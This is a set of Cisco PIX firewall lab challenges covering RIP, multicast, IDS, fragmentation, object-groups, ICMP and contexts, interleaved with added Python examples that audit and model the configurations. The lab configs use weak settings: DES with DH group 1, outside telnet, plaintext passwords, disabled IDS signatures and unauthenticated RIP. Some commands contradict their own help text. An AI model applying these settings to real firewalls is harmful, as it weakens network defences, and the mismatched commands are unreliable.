myPIX (config)# vpdn group 7 request dialout pppoe
myPIX (config)# vpdn group 7 localname newmexico
myPIX (config)# vpdn group 7 ppp authen pap
myPIX (config)# vpdn username daniel password dates
myPIX (config)# ip address outside pppoe setroute

Cisco PIX Challenge 32


Outline
This challenge involves the configuration of RIP on interfaces.
Objectives

The objectives of this challenge are to:

Define RIP listening version on interfaces.

Example
myPIX (config)# help rip
USAGE:
[no] rip <if_name> default|passive [version <1|2>]
[authentication <text|md5> <key> <key id>]
DESCRIPTION:
rip
Broadcast default route or passive RIP
SYNTAX:
<if_name>
The interface name, as specified by the 'nameif' command,
to set the RIP parameters for
default
Cause the Firewall to broadcast a default route
passive
Enable the Firewall to passively listen to RIP updates
[version <1|2>] Send/receive RIPv1 or RIPv2 packets (no authentication)
Default is RIPv1.
[authentication <text|md5> <key> <key id>] Specify authentication.
<text|md5>
Authenticate using the specified mode
<key>
The shared key to be used for authentication (16 chars. MAX)
<key id>
The shared key id that matches the <key> (0 - 255)
see also:
route, ping
myPIX (config)# rip outside passive version 1
myPIX (config)# rip inside passive version 1
myPIX (config)# rip inf2 passive version 1
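Read together, the commands from Challenges 22, 28, 29 and 32 (ISAKMP policy, Telnet/SSH/HTTP access, SNMP and RIP) leave several choices that weaken a PIX, and a short audit over the saved configuration catches them. The following Python is an added example, not NetworkSims or Cisco code: it runs over a configuration assembled from the challenge commands above (plus one authenticated RIP line added here for contrast), and the rule names and severities are this example's own.

```python
"""Audit a Cisco PIX configuration for the weak choices the help text
above makes available.  Added example, not NetworkSims or Cisco code."""
from collections import defaultdict

# Constructed sample built from the challenge commands above; the
# authenticated RIP line on 'inside' is added here for contrast.
SAMPLE_CONFIG = """\
isakmp enable outside
isakmp key ABC&FDD address 176.16.0.2 netmask 255.255.255.255
isakmp identity address
isakmp policy 5 authen pre-share
isakmp policy 5 encrypt des
isakmp policy 5 hash sha
isakmp policy 5 group 1
isakmp policy 5 lifetime 86400
telnet 204.134.17.7 255.255.192.0 inside
telnet 201.13.14.2 255.255.240.0 outside
telnet timeout 10
ssh 204.134.17.7 255.255.192.0 inside
http server enable
snmp-server community oldest ro
snmp-server host inside 160.61.110.11
rip outside passive version 1
rip inside passive version 2 authentication md5 s3cret 1
logging on
logging host 197.38.34.10
"""

# 'help isakmp' offers des/3des/aes..., md5/sha and DH groups 1/2/5/7;
# the weak end of each list is what this audit flags.
WEAK_ENCRYPTION = {"des"}
WEAK_HASH = {"md5"}
WEAK_DH_GROUP = {"1", "2"}
ISAKMP_ATTRS = ("authentication", "encryption", "hash", "group", "lifetime")


def canonical_attr(word):
    """Expand the abbreviations a PIX accepts ('authen', 'encrypt', ...)."""
    for full in ISAKMP_ATTRS:
        if full.startswith(word):
            return full
    return word


def syslog_over_tcp(tokens):
    """True if a 'logging host' line names TCP (keyword or protocol 6)."""
    return any(t.startswith("tcp") or t == "6" or t.startswith("6/") for t in tokens)


def audit(config_text):
    """Return a list of (severity, rule_id, message) findings."""
    findings = []
    policies = defaultdict(dict)               # priority -> {attr: value}
    for raw in config_text.splitlines():
        tok = raw.split()
        if not tok:
            continue
        if tok[:2] == ["isakmp", "policy"] and len(tok) >= 5:
            policies[tok[2]][canonical_attr(tok[3])] = tok[4].lower()
        elif tok[0] == "telnet" and len(tok) == 4 and tok[3] == "outside":
            findings.append(("high", "telnet-outside",
                             "cleartext telnet management allowed from outside: " + raw))
        elif tok[:2] == ["snmp-server", "community"]:
            findings.append(("medium", "snmp-community",
                             "SNMPv1/v2c community string configured; it is sent in cleartext"))
        elif tok[0] == "rip" and len(tok) >= 3 and "authentication" not in tok:
            findings.append(("medium", "rip-no-auth",
                             "RIP on " + tok[1] + " accepts unauthenticated updates"))
        elif tok[:2] == ["logging", "host"] and not syslog_over_tcp(tok[2:]):
            findings.append(("low", "syslog-udp",
                             "syslog host configured without tcp (UDP default): " + raw))
    for prio, attrs in sorted(policies.items(), key=lambda kv: int(kv[0])):
        if attrs.get("encryption") in WEAK_ENCRYPTION:
            findings.append(("high", "isakmp-weak-encrypt",
                             "isakmp policy %s uses %s" % (prio, attrs["encryption"])))
        if attrs.get("hash") in WEAK_HASH:
            findings.append(("medium", "isakmp-weak-hash",
                             "isakmp policy %s uses %s" % (prio, attrs["hash"])))
        if attrs.get("group") in WEAK_DH_GROUP:
            findings.append(("high", "isakmp-weak-dh",
                             "isakmp policy %s uses DH group %s" % (prio, attrs["group"])))
    return findings


if __name__ == "__main__":
    for severity, rule, message in audit(SAMPLE_CONFIG):
        print("[%-6s] %-20s %s" % (severity, rule, message))
```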

Cisco PIX Challenge 33


Outline
This challenge involves the configuration of multicast protocol.
Objectives
The objectives of this challenge are to:

Define multicast interface.
Define multicast parameters.

Example
myPIX # config t
myPIX (config)# multicast interface outside
myPIX(config-multicast)# igmp max 39
myPIX(config-multicast)# igmp version 2
myPIX(config-multicast)# igmp query-interval 33
myPIX(config-multicast)# igmp query-max 17
myPIX(config-multicast)# igmp forward interface inside
myPIX(config-multicast)# exit
myPIX (config)# multicast interface inside
myPIX(config-multicast)# exit
myPIX (config)# multicast interface inf2

Cisco PIX Challenge 34


Outline
This challenge involves the configuration of IDS signatures.
Objectives
The objectives of this challenge are to:

Define IP audit rules.
Remove IDS signatures.

Example
myPIX # config t
myPIX (config)# help ip
USAGE:
ip local pool <poolname> <ip1>[-<ip2>] [mask <netmask>]
ip verify reverse-path interface <if_name>
ip audit {info|attack} action [alarm] [drop] [reset]
ip audit name <audit_name> {info|attack} [action [alarm] [drop] [reset]]
ip audit interface <if_name> <audit_name>
ip audit signature <sig_number> disable
show|clear ip audit count [global] [interface <interface>]
clear configure ip audit [configuration]
DESCRIPTION:
ip
Define a local address pool
Configure Unicast RPF on an interface
Configure the Intrusion Detection System
SYNTAX:
<poolname> name of the local address pool
<ip1>-[<ip2>] address range of the local address pool
<netmask> network mask of the local address pool
<if_name> The name designated for the interface by the nameif command
info IDS informational signatures.
attack IDS attack signatures.
alarm When a signature match is detected, report the event
to syslog servers.
drop When a signature match is detected, drop the offending
packet.
reset When a signature match is detected, drop the offending
packet and close the connection if it is part of an
active connection.
<audit_name> Audit policy name.
<sig_number> IDS signature number.
see also:
interface, ip address (interface sub-mode command),
show interface, isakmp
myPIX (config)# ip audit info action alarm
myPIX (config)# ip audit attack action alarm
myPIX (config)# ip audit signature 1001 disable
myPIX (config)# ip audit signature 2001 disable
myPIX (config)# ip audit signature 3041 disable
myPIX (config)# ip audit signature 6100 disable
myPIX (config)# ip audit signature 6152 disable

Cisco PIX Challenge 35


Outline
This challenge involves the configuration of fragment guards.
Objectives
The objectives of this challenge are to:

Define fragment size.
Define fragment timeout.
Define ARP timeout.
Define names.

Example
myPIX # config t
myPIX (config)# sysopt security fragguard
myPIX (config)# help fragment
USAGE:
fragment {size|chain|timeout} <limit> [<interface>]
no fragment {size|chain|timeout} <limit> <interface>
show fragment [<interface>]
show running-config [all] fragment [<interface>]
clear configure fragment [<interface>]
clear fragment {queue|statistics} [<interface>]
DESCRIPTION:
fragment
Configure and display statistics of the IP fragment database
SYNTAX:
size <limit> - maximum number of blocks in database, range <1-30000>
chain <limit> - maximum number of element in a fragment set, range <1-8200>
timeout <limit> - number of seconds to assemble a fragment set, range <1-30>
queue - IP reassembly queue
statistics - IP reassembly statistics
<interface> - name of interface
myPIX (config)# fragment size 900
myPIX (config)# fragment chain 25
myPIX (config)# fragment timeout 5
myPIX (config)# help arp

USAGE:
[no] arp <if_name> <ip> <mac> [alias]
[no] arp timeout <seconds>
show arp [statistics]
clear arp [statistics]
show running-config [all] arp [timeout]
clear configure arp
DESCRIPTION:
arp
Change or view the ARP table, add or delete static ARP entries,
set or clear the ARP timeout value and clear ARP statistics
SYNTAX:
<if_name>
The interface name whose arp table will be changed or viewed
<ip>
IP address for an arp table entry
<mac>
Hardware 6 byte MAC address specified as XX:XX:XX:XX:XX:XX
or XXXX.XXXX.XXXX
alias
Proxy ARP for this static entry
<seconds>
Duration for which the dynamic ARP entries will remain
in the table
statistics
Statistics of the arp module
myPIX (config)# arp timeout 12718
myPIX (config)# name 210.139.173.7 newhampshire
myPIX (config)# name 155.146.19.10 fife
myPIX (config)# name illinois 212.176.154.6
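To see what the three 'fragment' limits from this challenge actually bound, here is a simplified model of the fragment database in Python. It is an added example, not Cisco's implementation: it keeps one global block counter rather than per-interface ones, keys fragment sets by the (source, destination, IP identification) tuple, and uses the limits from the challenge above (size 900, chain 25, timeout 5).

```python
"""Simplified model of what 'fragment size', 'fragment chain' and
'fragment timeout' bound on the PIX fragment database.  Added example,
not Cisco code: one global block counter rather than per-interface ones,
and fragment sets keyed by (source, destination, IP identification)."""
from dataclasses import dataclass, field


@dataclass
class FragmentSet:
    first_seen: float                              # arrival time of the first piece
    fragments: dict = field(default_factory=dict)  # offset -> (length, more)

    def reassembled_length(self):
        """Total length once the set is contiguous from offset 0 and the
        last piece has the more-fragments flag clear, else None."""
        end = 0
        for offset in sorted(self.fragments):
            length, more = self.fragments[offset]
            if offset != end:                      # hole: still incomplete
                return None
            end = offset + length
            if not more:
                return end
        return None


class FragmentDatabase:
    def __init__(self, size=900, chain=25, timeout=5):
        self.size = size          # 'fragment size': max blocks held overall
        self.chain = chain        # 'fragment chain': max pieces in one set
        self.timeout = timeout    # 'fragment timeout': seconds to assemble
        self.sets = {}
        self.blocks = 0
        self.stats = {"accepted": 0, "reassembled": 0, "expired": 0,
                      "dropped_size": 0, "dropped_chain": 0}

    def _discard(self, key, counter):
        self.blocks -= len(self.sets[key].fragments)
        del self.sets[key]
        self.stats[counter] += 1

    def expire(self, now):
        """Drop every set that has waited longer than the timeout."""
        stale = [k for k, s in self.sets.items()
                 if now - s.first_seen > self.timeout]
        for key in stale:
            self._discard(key, "expired")

    def add(self, key, offset, length, more, now):
        """Queue one fragment; return the datagram length when its set
        completes, otherwise None."""
        self.expire(now)
        if self.blocks >= self.size:
            self.stats["dropped_size"] += 1        # database full: drop piece
            return None
        fset = self.sets.setdefault(key, FragmentSet(first_seen=now))
        if len(fset.fragments) >= self.chain:
            self._discard(key, "dropped_chain")    # chain limit: drop the set
            return None
        if offset not in fset.fragments:           # duplicates are not counted
            fset.fragments[offset] = (length, more)
            self.blocks += 1
        self.stats["accepted"] += 1
        total = fset.reassembled_length()
        if total is not None:
            self._discard(key, "reassembled")
        return total


def demo():
    """Constructed traffic: one normal datagram, one abandoned set and one
    burst of tiny pieces that never completes and exceeds the chain."""
    db = FragmentDatabase(size=900, chain=25, timeout=5)
    normal = ("10.0.0.5", "10.0.0.9", 0x1A2B)
    db.add(normal, 0, 8, True, 0.0)
    db.add(normal, 8, 8, True, 0.1)
    done = db.add(normal, 16, 8, False, 0.2)       # completes: 24 bytes
    abandoned = ("10.0.0.5", "10.0.0.9", 0x2C3D)
    db.add(abandoned, 0, 8, True, 1.0)             # never completed
    probe = ("10.0.0.5", "10.0.0.9", 0x4455)
    db.add(probe, 0, 8, True, 7.0)                 # 6 s later: abandoned set expires
    burst = ("192.0.2.7", "10.0.0.9", 0x3E4F)
    for i in range(30):                            # 30 pieces, all 'more'
        db.add(burst, i * 8, 8, True, 8.0)
    return done, db.stats


if __name__ == "__main__":
    print(demo())
```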

Cisco PIX Challenge 36


Outline
This challenge involves the configuration of MTU for each interface.
Objectives
The objectives of this challenge are to:

Define the name and security level of each interface.
Define the IP address and subnet mask of each interface.
Define the MTU for each interface.

Example
myPIX # config t
myPIX (config)# nameif e0 delaware security_0
myPIX (config)# ip address delaware 134.100.122.5 255.255.252.0
myPIX (config)# interface e0 auto
myPIX (config)# help mtu

USAGE:
mtu <if_name> <bytes> | (300-65535)
DESCRIPTION:
mtu
Specify MTU(Maximum Transmission Unit) for an interface
SYNTAX:
<if_name>
The interface name specified in the nameif command
<bytes>
The number of bytes from 300-65535 for the MTU

pixfirewall(config)# help multicast-r
USAGE:
[no] multicast-routing
clear configure multicast-routing
DESCRIPTION:
multicast-routing
Configure multicast routing
myPIX (config)# mtu delaware 1268
myPIX (config)# nameif e1 falkirk security_100
myPIX (config)# ip address falkirk 192.130.14.15 255.255.252.0
myPIX (config)# interface e1 auto
myPIX (config)# mtu falkirk 1500

myPIX (config)# nameif e2 dmz security_50
myPIX (config)# ip address dmz 121.110.12.6 255.255.252.0
myPIX (config)# interface e2 auto
myPIX (config)# mtu dmz 1300

Example (V 7.x)
myPIX # config t
myPIX # int e0
myPIX (config-if)# nameif delaware
myPIX (config-if)# security 0
myPIX (config-if)# ip address 134.100.122.5 255.255.252.0
myPIX (config-if)# no shutdown
myPIX (config-if)# exit
myPIX (config)# help mtu

USAGE:
mtu <if_name> <bytes> | (300-65535)
DESCRIPTION:
mtu

Specify MTU(Maximum Transmission Unit) for an interface

SYNTAX:
<if_name>

The interface name specified in the nameif command

<bytes>

The number of bytes from 300-65535 for the MTU

pixfirewall(config)# help multicast-r


USAGE:
[no] multicast-routing
clear configure multicast-routing
DESCRIPTION:
multicast-routing
Configure multicast routing
myPIX (config)# mtu delaware 1500

etc

Cisco PIX Challenge 37


Outline
This challenge involves the configuration of network and service objects.
Objectives
The objectives of this challenge are to:

Define the name of the network object-group.
Define the description of the network object-group.
Define hosts for the network object-group.
Define a network for the network object-group.
Define the name of the service object-group.
Define the description of the service object-group.
Define TCP ports for the service object-group.
Define a range of ports for the service object-group.

Example
myPIX # config t
myPIX (config)# help object-group
USAGE:
[no] object-group protocol | network | icmp-type <obj_grp_id>
[no] object-group service <obj_grp_id> tcp|udp|tcp-udp
show running-config [all] object-group
[protocol | service | icmp-type | network]
show running-config [all] object-group id <obj_grp_id>
clear configure object-group [protocol | service | icmp-type | network]
DESCRIPTION:
object-group

Create an object group for use in 'access-list'

SYNTAX:
protocol   Specifies a group of protocols, such as TCP, etc
network    Specifies a group of host or subnet IP addresses
service    Specifies a group of TCP/UDP ports/services
icmp-type  Specifies a group of ICMP types, such as echo

<obj_grp_id>

The identifier for the object group:
Must be 1 - 64 characters long, consisting of
letters, digits, '-', '_', or '.'.

tcp|udp|tcp-udp

Specifies the protocol type for a service group;
tcp - services provided via TCP only, such as ftp
udp - services provided via UDP only, such as snmp
tcp-udp - services provided via both TCP and UDP

show

Show object group(s) running config

clear

Remove existing object group(s) config

see also:

protocol-object, network-object,
port-object, icmp-object, group-object
myPIX (config)# object-group ?
configure mode commands/options:
icmp-type  Specifies a group of ICMP types, such as echo
network    Specifies a group of host or subnet IP addresses
protocol   Specifies a group of protocols, such as TCP, etc
service    Specifies a group of TCP/UDP ports/services
pixfirewall(config)# object-group network ?
configure mode commands/options:
WORD < 65 char  Specifies object-group ID (1-64 characters)

myPIX (config)# object-group network mississippi


myPIX(config-network)# description sales connection
myPIX(config-network)# net ?
network-object-group mode commands/options:
Hostname or A.B.C.D     Enter an IPv4 network address
X:X:X:X::X/<0-128>      Enter an IPv6 prefix
host                    Enter this keyword to specify a single host object
myPIX(config-network)# net host ?
network-object-group mode commands/options:
Hostname or A.B.C.D     Enter a host IP address or name
Hostname or X:X:X:X::X  Enter a host IPv6 address or name
myPIX(config-network)# network-object host 110.162.152.2 ?
myPIX(config-network)# network-object host 110.162.152.2
myPIX(config-network)# network-object host 192.167.1.1
myPIX(config-network)# network-object host 194.10.1.10
myPIX(config-network)# network-object 110.162.152.0 ?
network-object-group mode commands/options:
A.B.C.D Enter an IPv4 network mask
myPIX(config-network)# network-object 110.162.152.0 255.255.0.0
myPIX(config-network)# exit
myPIX (config)# object-group service ?
configure mode commands/options:
WORD < 65 char  Specifies object-group ID (1-64 characters)
myPIX (config)# object-group service texas ?
configure mode commands/options:
tcp      Specifies this object-group is for TCP protocol only
tcp-udp  Specifies this object-group is for both TCP & UDP
udp      Specifies this object-group is for UDP protocol only
myPIX (config)# object-group service texas tcp
myPIX(config-network)# description test connection
myPIX (config-service)# port- ?
service-object-group mode commands/options:
eq     Enter this keyword to specify a port
range  Enter this keyword to specify a range of ports
myPIX (config-service)# port-object eq ?
service-object-group mode commands/options:
<0-65535>  Enter port number (0 - 65535)
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
myPIX(config-network)# port-object eq telnet
myPIX(config-network)# port-object eq ftp
myPIX(config-network)# port-object eq www
myPIX(config-network)# port-object range 1411 1422
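What the firewall actually evaluates once these groups are referenced from an access-list is a flat cross product of the group members, and the identifier rules in the help text above are easy to get wrong by hand. The following Python is an added example, not part of the challenge or of NetworkSims' material: it validates object-group identifiers against the documented constraint, models the `mississippi` and `texas` groups from the transcript, expands them as a hypothetical `permit tcp object-group mississippi any object-group texas` entry would (the challenge itself never writes that access-list), and flags group members already covered by a broader member. The port-name table is constructed for the three names used in the transcript.

```python
import itertools
import re
from ipaddress import IPv4Network

# Identifier rule from the 'help object-group' text: 1-64 characters drawn from
# letters, digits, '-', '_' or '.'.
OBJ_GRP_ID_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")

# Constructed lookup for the port names used in the transcript (well-known values).
PORT_NAMES = {"ftp": 21, "telnet": 23, "www": 80}


def valid_obj_grp_id(obj_grp_id):
    """True if the identifier meets the documented length and character constraints."""
    return OBJ_GRP_ID_RE.fullmatch(obj_grp_id) is not None


def network_object(host=None, network=None, mask=None):
    """Model 'network-object host A.B.C.D' or 'network-object A.B.C.D M.M.M.M'.
    The PIX takes a conventional netmask, so strict=False normalises
    110.162.152.0 255.255.0.0 to 110.162.0.0/16, which is what the firewall matches on."""
    if host is not None:
        return IPv4Network(f"{host}/32")
    return IPv4Network(f"{network}/{mask}", strict=False)


def port_object(eq=None, rng=None):
    """Model 'port-object eq <port>' or 'port-object range <lo> <hi>' as an inclusive (lo, hi) pair."""
    if eq is not None:
        port = int(PORT_NAMES.get(eq, eq))
        return (port, port)
    lo, hi = (int(p) for p in rng)
    if not (0 <= lo <= hi <= 65535):
        raise ValueError(f"bad port range {lo}-{hi}")
    return (lo, hi)


def expand_aces(protocol, src_group, dst_group, svc_group):
    """Flatten 'permit <proto> object-group SRC object-group DST object-group SVC'
    into the individual (proto, src, dst, lo, hi) entries the firewall evaluates."""
    return [(protocol, str(s), str(d), lo, hi)
            for s, d, (lo, hi) in itertools.product(src_group, dst_group, svc_group)]


def redundant_network_objects(group):
    """Members already covered by a broader member of the same group: harmless to
    the firewall, but a sign the group does not say what its author thinks it says."""
    return [str(n) for n in group
            if any(n != other and n.subnet_of(other) for other in group)]


# The two groups configured in the transcript above.
MISSISSIPPI = [
    network_object(host="110.162.152.2"),
    network_object(host="192.167.1.1"),
    network_object(host="194.10.1.10"),
    network_object(network="110.162.152.0", mask="255.255.0.0"),
]
TEXAS = [
    port_object(eq="telnet"),
    port_object(eq="ftp"),
    port_object(eq="www"),
    port_object(rng=("1411", "1422")),
]
ANY = [IPv4Network("0.0.0.0/0")]

if __name__ == "__main__":
    for entry in expand_aces("tcp", MISSISSIPPI, ANY, TEXAS):
        print(entry)
    print("redundant:", redundant_network_objects(MISSISSIPPI))
```

Four network members times four service members give sixteen entries; the check on `MISSISSIPPI` reports the host `110.162.152.2`, which the `255.255.0.0` mask on the last member already covers.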

Cisco PIX Challenge 38


Outline
This challenge involves enabling ICMP on interfaces, and the setup of virtual Telnet and
virtual HTTP.
Objectives
The objectives of this challenge are to:

Enable ICMP on the inside interface.
Enable ICMP on the outside interface.
Enable ICMP on the DMZ interface.

Example
myPIX # config t
myPIX (config)# help icmp
USAGE:
[no] icmp permit|deny <ip-address> <net-mask> [<icmp-type>] <if-name>
clear configure icmp
show running-config [all] icmp
DESCRIPTION:
icmp

Configure access for ICMP traffic that terminates at an interface

SYNTAX:
deny

Denies access if the conditions are matched.

permit

Permits access if the conditions are matched.

<ip-address>  IP address
<net-mask>    Mask to be applied to <ip-address>

<icmp-type>

echo-reply, unreachable, source-quench,
redirect, alternate-address, echo,
router-advertisement, router-solicitation, time-exceeded,
parameter-problem, timestamp-reply, timestamp-request,
information-request, information-reply, mask-request,
mask-reply, conversion-error or mobile-redirect

<if-name>

Name of the interface

see also:
access-list, access-group
myPIX(config)# icmp permit 10.0.0.0 255.255.0.0 ?
configure mode commands/options:
<0-255>
Enter ICMP type number (0 - 255)
alternate-address
conversion-error
echo
echo-reply
information-reply
information-request
mask-reply
mask-request
mobile-redirect
parameter-problem
redirect
router-advertisement
router-solicitation
source-quench
time-exceeded
timestamp-reply
timestamp-request
traceroute
Current available interface(s):
inf      Name of interface Ethernet2
inside   Name of interface Ethernet1
outside  Name of interface Ethernet0
myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 inside
myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 outside
myPIX (config)# icmp enable 10.0.0.0 255.255.0.0 inf2
myPIX (config)# help virtual
USAGE:
[no] virtual http <ip> [warn]
[no] virtual telnet <ip>
DESCRIPTION:
virtual

Set address for authentication virtual servers

SYNTAX:
<ip>

A public or private IP address that is not the address
of a real web server on the interface you are accessing.
Cisco recommends using an RFC 1918 address.

<warn>

Let users know that the command was redirected.
The option is only applicable for text-based browsers
where the redirect cannot happen automatically.

myPIX (config)# virtual telnet 10.1.2.3


myPIX (config)# vir http ?
configure mode commands/options:
Hostname or A.B.C.D A public or private IP address that is not the address
of a real web server on the interface accessed.
Cisco recommends using an RFC 1918 address.
myPIX (config)# virtual http 176.1.2.3

Cisco PIX Challenge 39


Outline
This challenge involves denying certain MAC addresses.
Objectives
The objectives of this challenge are to:

Define a list of denied MAC addresses.

Example
myPIX # config t
myPIX (config)# help mac
USAGE:
[no] mac-list <id> deny|permit <mac> <macmask>
show mac-list [id]
clear mac-list [id]


DESCRIPTION:
mac-list

Add a list of mac addresses using first match search

SYNTAX:
<id>

Mac Access list number

deny

Traffic matching deny is not included in list

permit

Traffic matching permit is included in list

<mac>

Source mac address

<macmask>

Mask to be applied to <mac>

myPIX (config)# mac-list 1 deny 0000.1111.ffff
myPIX (config)# mac-list 1 deny 0000.2222.ffff
myPIX (config)# mac-list 1 deny 0000.3333.ffff
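The help text says the list is searched first-match with a mask applied to the source MAC, which decides how entries must be ordered. The Python below is an added example, not code from the challenge or from NetworkSims: it parses both MAC notations the PIX accepts, models `mac-list` entries and performs the masked first-match lookup. The transcript above omits `<macmask>`, so an all-ones mask (exact match) is assumed for those entries; the second list, `ORDERED`, is constructed purely to show the effect of entry order.

```python
import re

# Both MAC notations the PIX help text accepts: XX:XX:XX:XX:XX:XX and XXXX.XXXX.XXXX.
_MAC_RE = re.compile(r"(?:[0-9a-f]{2}(?::[0-9a-f]{2}){5}|[0-9a-f]{4}(?:\.[0-9a-f]{4}){2})")


def parse_mac(text):
    """Return the 48-bit integer value of a MAC written in either notation."""
    t = text.strip().lower()
    if _MAC_RE.fullmatch(t) is None:
        raise ValueError(f"not a MAC address: {text!r}")
    return int(t.replace(":", "").replace(".", ""), 16)


def mac_list_entry(action, mac, macmask="ffff.ffff.ffff"):
    """One 'mac-list <id> deny|permit <mac> <macmask>' line.
    The transcript above omits <macmask>; an all-ones mask (exact match) is
    assumed here for those entries. That default is this example's assumption."""
    if action not in ("deny", "permit"):
        raise ValueError(f"action must be deny or permit, got {action!r}")
    return (action, parse_mac(mac), parse_mac(macmask))


def mac_list_lookup(entries, source_mac):
    """First-match search, as the help text describes: the first entry whose
    masked value equals the masked source MAC decides. Returns 'deny', 'permit'
    or None when nothing in the list matched."""
    src = parse_mac(source_mac)
    for action, mac, mask in entries:
        if (src & mask) == (mac & mask):
            return action
    return None


# The list built in the transcript (mask assumed, see mac_list_entry).
MAC_LIST_1 = [
    mac_list_entry("deny", "0000.1111.ffff"),
    mac_list_entry("deny", "0000.2222.ffff"),
    mac_list_entry("deny", "0000.3333.ffff"),
]

# Constructed list showing why entry order matters: a specific deny placed
# before a masked permit that covers the whole 0000.1111.xxxx block.
ORDERED = [
    mac_list_entry("deny", "0000.1111.ffff"),
    mac_list_entry("permit", "0000.1111.0000", "ffff.ffff.0000"),
]

if __name__ == "__main__":
    for mac in ("00:00:11:11:ff:ff", "0000.2222.fffe"):
        print(mac, "->", mac_list_lookup(MAC_LIST_1, mac))
```

Reversing `ORDERED` makes the masked permit shadow the exact deny, which is the kind of mistake a first-match list invites and the reason the narrow entry has to come first.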

Cisco PIX Challenge 40


Outline
PIX Version 7.x
The new PIX image supports interface configuration mode. This challenge shows how to set
the interface parameters.
Objectives
The objectives of this challenge are to:

Define the IP address and subnet mask for E0.
Define the name of the E0 interface.
Define the description of the E0 interface.
Define the IP address and subnet mask for E1.
Define the name of the E1 interface.
Define the description of the E1 interface.
Define the IP address and subnet mask for E2.
Define the name of the E2 interface.
Define the description of the E2 interface.

Example
# config t
myPIX (config)# hostname myPIX
myPIX (config)# int e0
myPIX (config-if)# nameif fred
myPIX (config-if)# ip address 192.168.1.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# description my port
myPIX (config-if)# exit
myPIX (config)# int e1
myPIX (config-if)# nameif test
myPIX (config-if)# ip address 192.168.2.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# description your port
myPIX (config-if)# exit
myPIX (config)# int e2
myPIX (config-if)# nameif market
myPIX (config-if)# ip address 192.168.3.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# description any port
myPIX (config-if)# exit

Cisco PIX Challenge 41


Outline
PIX Version 7.x only
The new PIX image supports a modular policy framework.
Objectives
The objectives of this challenge are to:

Define class maps. Remember the class map defines the traffic which is interesting.
In this case the class-map relates to defining TCP ports and an access-list.
Apply the class maps.
Define a policy map and apply it to an interface.

Example
myPIX# config t
myPIX(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq echo
myPIX(config)# class-map ?
myPIX(config)# class-map delaware
myPIX(config-cmap)# ?
myPIX(config-cmap)# description ?
myPIX(config-cmap)# description testing
myPIX(config-cmap)# match ?
myPIX(config-cmap)# match port ?
myPIX(config-cmap)# match port tcp ?
myPIX(config-cmap)# match port tcp eq ?
myPIX(config-cmap)# match port tcp eq 80
myPIX(config-cmap)# match port tcp eq 21
myPIX(config-cmap)# match port tcp eq 23
myPIX(config-cmap)# match port udp eq 23
myPIX(config-cmap)# match access-list ?
myPIX(config-cmap)# match access-list 100
myPIX(config-cmap)# match dscp ?
myPIX(config-cmap)# exit
myPIX(config)# class-map VOICE
myPIX(config-cmap)# exit
myPIX(config)# class-map EXECTEST
myPIX(config-cmap)# exit
myPIX(config)# policy-map ?
myPIX(config)# policy-map NEW
myPIX(config-pmap)# ?
myPIX(config-pmap)# description ?
myPIX(config-pmap)# description test
myPIX(config-pmap)# class ?
myPIX(config-pmap)# class delaware
myPIX(config-pmap-c)# ?
myPIX(config-pmap-c)# inspect ?
myPIX(config-pmap-c)# ips ?
myPIX(config-pmap-c)# police ?
myPIX(config-pmap-c)# police 1000 ?
myPIX(config-pmap-c)# police 1000 500
myPIX(config-pmap-c)# set ?
myPIX(config-pmap-c)# set conn ?
myPIX(config-pmap-c)# exit
myPIX(config-pmap)# exit
myPIX(config)# service-policy ?
myPIX(config)# service-policy NEW ?
myPIX(config)# service-policy NEW interface ?
myPIX(config)# service-policy NEW interface outside

Example
An example, which has not yet been implemented in the challenge, is:
pix1(config)# class-map TEST
pix1(config-cmap)# match port tcp eq 25
pix1(config-cmap)# match tunnel-group S2S
pix1(config-cmap)# exit
pix1(config)# class-map VOICE
pix1(config-cmap)# match dscp ef
pix1(config-cmap)# exit
pix1(config)# class-map EXECTEST
pix1(config-cmap)# match access-list 112
pix1(config-cmap)# exit
pix1(config)# policy-map NEW
pix1(config-cmap)# class TEST

Cisco PIX Challenge 42



Outline
PIX Version 7.x only
The new PIX image supports multiple contexts.
Objectives
The objectives of this challenge are to:

Define context mode.
Save context mode to a configuration file.
Define that interfaces on the same security level can communicate with each other.

Example (Ver 7.x)


pix1(config)# mode multiple
pix1(config)# context test1
pix1(config-ctx)# allocate-interface e0
pix1(config-ctx)# allocate-interface e1
pix1(config-ctx)# config-url flash:/test1.cfg
pix1(config-ctx)# exit
pix1(config)# context test2
pix1(config-ctx)# allocate-interface e2
pix1(config-ctx)# config-url flash:/test2.cfg
pix1(config-ctx)# exit
pix1(config)# same-security-traffic permit inter-interface

Cisco PIX Challenge 43


Outline
This is a test for some basic PIX configuration parameters ... no help is given.


Cisco PIX Challenge 44


Outline
This is a test for some basic PIX configuration parameters ... no help is given.

Cisco PIX Challenge 45


Outline
This is a test for some basic PIX configuration parameters ... no help is given.

Cisco PIX Challenge 46


Outline
This challenge uses DHCP allocation.
Objectives
The objectives of this challenge are to:

Define E0 details.
Define E1 details.


Example (Ver 6.x)


> enable
# config t
(config)# hostname myPIX
myPIX (config)# domain-name strathclyde.int
myPIX (config)# nameif e0 moon security9
myPIX (config)# ip address moon dhcp
myPIX (config)# interface e0 auto
myPIX (config)# nameif e1 mars security100
myPIX (config)# ip address mars dhcp
myPIX (config)# interface e1 auto
myPIX (config)# nameif e2 pluto security100
myPIX (config)# ip address pluto dhcp
myPIX (config)# interface e1 auto

Example (Ver 7.x)


> enable
# config t
(config)# hostname myPIX
myPIX (config)# domain-name strathclyde.int
myPIX (config)# int e0
myPIX (config-if)# nameif moon
myPIX (config-if)# help ip
USAGE:
[no] ip address <ip_address> [<mask>] [standby <sby_ip_addr>]
[no] ip address dhcp [setroute] [retry <4-16>]
show ip address [<interface> | <if_name>]
clear ip
DESCRIPTION:
ip

Set the ip address and mask for an interface

SYNTAX:
<ip_address>   Device's network interface address
<mask>         Netmask of ip_address
